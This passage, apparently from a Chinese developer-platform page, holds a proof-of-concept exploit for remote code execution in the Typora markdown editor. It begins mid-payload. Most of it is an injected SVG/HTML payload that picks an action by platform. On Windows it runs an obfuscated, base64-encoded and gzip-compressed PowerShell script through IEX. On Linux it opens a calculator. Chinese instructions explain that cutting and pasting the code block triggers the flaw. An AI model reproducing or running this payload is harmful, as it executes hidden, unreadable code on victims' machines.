B1AHMASwA1AHEALwBkAGgAagBjAFMAdQBnAC8ANgBQAE0AZgBqAE8ANgAzADkAbgBOACsATQB2AG4AeAArAC8AcwBaAGMAagArAHAAeQB5ADcARQBIACsARgA4AEcARABsAHIAUABmAEQAUQBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])'))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

选中代码块全部内容, Ctrl + x 剪切,然后在 Ctrl + V 粘贴即可触发漏洞(注:不要粘贴到原有的代码块中,粘贴到其他空白地方)。

Logo

旨在为数千万中国开发者提供一个无缝且高效的云端环境,以支持学习、使用和贡献开源项目。

更多推荐